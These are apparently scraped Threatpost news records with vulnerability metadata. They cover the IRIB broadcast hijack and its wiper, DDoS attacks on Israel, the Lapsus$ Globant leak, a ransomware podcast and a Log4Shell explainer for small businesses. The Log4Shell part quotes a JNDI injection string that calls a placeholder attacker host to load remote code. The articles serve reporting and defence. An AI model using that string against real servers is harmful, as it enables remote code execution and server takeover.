While Iranian officials believe the Iranian opposition political party MEK is behind the attack, the group itself has denied involvement, researchers said.\n\nFurther, hacktivist group Predatory Sparrow, which claimed responsibility for the previous three infrastructure attacks, also affiliated itself with the IRIB attack via its Telegram channel. However, this is unlikely, as \u201cno technical proof of the group\u2019s attribution to the attack has been discovered,\u201d according to Check Point.\n\nWhat is known about the threat actor, however, is that due to the relative complexity of the attack itself, the group \u201cmay have many capabilities that have yet to be explored,\u201d researchers noted.\n\nAt the same time, their reliance on IRIB insiders may have been the secret to the attackers\u2019 success, as the tools they used are of \u201crelatively low quality and sophistication, and are launched by clumsy and sometimes buggy 3-line batch scripts,\u201d according to Check Point.\n\n\u201cThis might support the theory that the attackers might have had help from inside the IRIB, or indicate a yet unknown collaboration between different groups with different skills,\u201d researchers noted.\n\n## **Specific Malware **\n\nWhile researchers said they are still not sure how the attackers gained initial access to IRIB networks, they managed to retrieve and analyze malware related to the later stages of the attack that did three things: established backdoors and their persistence, launched the video or audio track playing the assassination message, and installed the wiper to disrupt operations in the hacked networks.\n\nAttackers used four backdoor strategies in the attack: WinScreeny, HttpCallbackService, HttpService and ServerLaunch, a dropper launched with HttpService.\n\nWinScreeny is a backdoor with the main purpose of capturing screenshots of the victim\u2019s computer. 
HttpCallbackService is a remote-administration tool (RAT) that communicates with the command-and-control (C2) server every five seconds to receive commands to execute. HttpService is a backdoor that listens on a specified port and can execute commands, manipulate local files, download or upload files, or perform other malicious activities.\n\nFinally, the ServerLaunch dropper \u2013 which starts both httpservice2 and httpservice4, each of which has a different predefined port to listen on \u2013 likely allows the attackers to ensure some sort of redundancy of the C2 communication, researchers wrote.\n\n## **Hijacking the Video Stream**\n\nTo interrupt the TV stream and play the opposition\u2019s message, attackers used a program called SimplePlayout.exe, a .NET-based executable with a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.\n\nTo kill the video stream already playing so they could deploy their own, the attackers used a batch script called playjfalcfgcdq.bat, which killed the running process and deleted the executable of TFI Arista Playout Server, a software that the IRIB is [known](<http://rd.irib.ir/documents/25760057/f39f659c-8a0b-42f3-a1e9-d716cd5b8afe>) to use for broadcasting.\n\nAttackers connected the dots with a script, layoutabcpxtveni.bat, that made the necessary connections to replace the IRIB video content with their own through a series of functions, including the launch of SimplePlayout.exe, researchers wrote.\n\n## **The Wiper**\n\nIn analyzing the wiper used in the attacks, researchers found \u201ctwo identical .NET samples named msdskint.exe whose main purpose is to wipe the computer\u2019s files, drives, and MBR,\u201d they reported.\n\nThe malware also has the capability to clear Windows Event Logs, delete backups, kill processes and change users\u2019 passwords, among other features.\n\nTo corrupt files, the wiper has three modes: default, which overwrites the first 200 bytes of each chunk 
of 1024 bytes with random values; light-wipe, which overwrites a number of chunks specified in the configuration; and full_purge, which does just that \u2013 overwrites the entire file content.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T13:46:04", "type": "threatpost", "title": "Iranian State Broadcaster Clobbered by \u2018Clumsy, Buggy\u2019 Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-18T13:46:04", "id": "THREATPOST:BE11CFFFFEA1B470C8A24CA24D76A7C6", "href": "https://threatpost.com/iranian-state-broadcaster-clumsy-buggy-code/178524/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-15T20:03:19", "description": "Israel\u2019s National Cyber Directorate confirmed in a tweet on Monday that a distributed denial-of-service (DDoS) attack against a telecommunications provider took down several government sites, as well as others not affiliated with the government. 
The incident led the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state-backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. 
Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nThe timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks**\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe, Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result, the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. 
\u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\nIn addition, \u201ccybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-30T17:35:11", "description": "The Lapsus$ data extortionists are back from a week-long \u201cvacation,\u201d they announced on Telegram, posting ~70GB worth of data purportedly 
stolen from software development giant Globant.\n\n\u201cWe are officially back from a vacation,\u201d the gang wrote on their Telegram channel, posting images of exfiltrated data and admin credentials. The credentials, purportedly belonging to Globant\u2019s customers, unlock several of the company\u2019s Atlassian suite DevOps platforms, including GitHub, Jira, Confluence and the Crucible code-review tool.\n\nThe shared, 70GB torrent file purportedly also contains Globant\u2019s source code, as well as the Atlassian admin passwords. Security researchers shared the images today, on Wednesday.\n\nScreenshots show a folder directory of what looks like scads of companies from across the world, including tech bigwigs Arcserve, Facebook, the Apple Health app, DHL, Citibank, BNP Paribas Cardiff and Citibanamex, among others: just a teaser of the Globant data Lapsus$ has promised to leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30111855/Lapsus_Globant_leak-e1648653558836.jpg>)\n\nA teaser of the Globant data Lapsus$ said it was about to leak. Source: Telegram.\n\n> This is bad with all the keys, codes and damaging databases to go through to find corporate exposure and liability and to secure digital assets. <https://t.co/FHcs88V3nM>\n> \n> \u2014 Dominic Alvieri (@AlvieriD) [March 30, 2022](<https://twitter.com/AlvieriD/status/1509174961822486538?ref_src=twsrc%5Etfw>)\n\nThe folders could be evidence of client data having been exposed, or they might just refer to Globant backups. But Lapsus$ followed up by posting a 718.8KB torrent file to Telegram \u2013 a file that allegedly contains the leaked data. The post says: \u201cLeak of some customers source code from Globant[.]com corp GHE and GHE.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30113855/Lapsus-followup-torrent-file-e1648654747345.jpg>)\n\nFollowup torrent file posted to Lapsus$\u2019s Telegram channel. 
Source: Telegram.\n\nBut as GovInfoSecurity [pointed out](<https://www.govinfosecurity.com/despite-arrests-lapsus-adds-globant-to-victim-list-a-18813>), even if Globant\u2019s source code wasn\u2019t directly affected, the source code of the software it provides to its customers may be.\n\n## About Those Admin Credentials\n\nVx-underground \u2013 an internet collection of malware source code, samples and papers \u2013 cited security researcher Dominic Alvieri in tweeting that Lapsus$ threw Globant\u2019s sysadmins \u201cunder the bus\u201d by exposing their passwords to Confluence and other DevOps platforms.\n\nThat shouldn\u2019t come as a surprise: It\u2019s not like the data extortion group has a collection of kid gloves. It has, rather, slapped around the likes of [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>), the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [Portuguese media kingpin](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nVx-underground censored those admin passwords, but its whiteout treatment can\u2019t hide the fact that the passwords were pretty stubby and, hence, [pretty guessable](<https://threatpost.com/euros-football-fever-dumb-passwords/166974/>), as well as being [reused](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). 
\u201cWe have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times,\u201d the collection noted.\n\n> LAPSUS$ also threw their System Admins under the bus exposing their passwords to confluence (among other things). We have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times\u2026 [pic.twitter.com/gT7skg9mDw](<https://t.co/gT7skg9mDw>)\n> \n> \u2014 vx-underground (@vxunderground) [March 30, 2022](<https://twitter.com/vxunderground/status/1509015154930896899?ref_src=twsrc%5Etfw>)\n\nIn fact, after reviewing the admin passwords, GovInfoSecurity found that a similar-looking password was reused for the Confluence and Jira platforms, while the one used for GitHub \u201cappears similar to ones on the list of[ 200 most commonly used passwords](<https://nordpass.com/most-common-passwords-list/>).\u201d\n\n## So Much for the Arrests\n\nLapsus$\u2019s \u201cvacation\u201d may have been in Tahiti, for all we know, or it may have been time spent reshuffling. At any rate, last week, the City of London Police [arrested](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) seven people suspected of being connected to the gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind. 
The police didn\u2019t verify whether or not they nabbed the Oxford teen, per se, but given that he\u2019s a minor, they legally couldn\u2019t divulge that detail anyway.\n\nAll of the suspects arrested by London police were released, but the law isn\u2019t going to let up.\n\nAs of a week ago, March 21, the FBI had slapped Lapsus$ onto its [Most Wanted](<https://www.fbi.gov/wanted/seeking-info/lapsus>) list.\n\n\u201cOn March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies,\u201d the FBI said. \u201cThese unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.\u201d\n\nKen Westin, director, security strategy at Cybereason, told Threatpost on Wednesday that Lapsus$\u2019s quick resurface after its short hiatus isn\u2019t surprising, given the fact that cybercriminal networks are often spread around the world.\n\n\u201cCybercrime groups, like hacktivist groups, often work in a decentralized fashion, with many members not even knowing each other\u2019s true identities,\u201d he said via email. \u201cThe fact this group is made up of members in many different countries presents challenges for law enforcement as they will need to collaborate with different countries with varying levels of capabilities to go after the perpetrators.\u201d\n\nWestin noted that the Globant breach \u201cseems a bit different on the surface,\u201d given that the resources that were allegedly compromised were around Globant\u2019s DevOps processes. It raises the question of where the initial compromise was and what Lapsus$ did with the access. 
\u201cWhat is also concerning regarding this compromise is that potential source code for some of their customers appears to have been exposed and Lapsus$ is going after organizations via Globant\u2019s technology and now services partners,\u201d he added.\n\n033022 12:40 UPDATE: Added input from Ken Westin.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:29:10", "type": "threatpost", "title": "Lapsus$ \u2018Back from Vacation\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T16:29:10", "id": "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "href": 
"https://threatpost.com/lapsus-back-from-vacation/179156/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. 
In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? 
Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d \u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and 
advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpost)._\n\n_**Questions answered:**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, any business that runs or depends on Java-based software, its website included, is likely to be affected. 
With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. 
\u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne: **In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. 
SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit**: The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security: **This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. 
And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven: **\u201cA real-world attack can be as simple as the attacker sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in [this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers: **Attackers send requests to vulnerable applications; this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of the victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers: **These kinds of wide-sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendors\u2019 software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. 
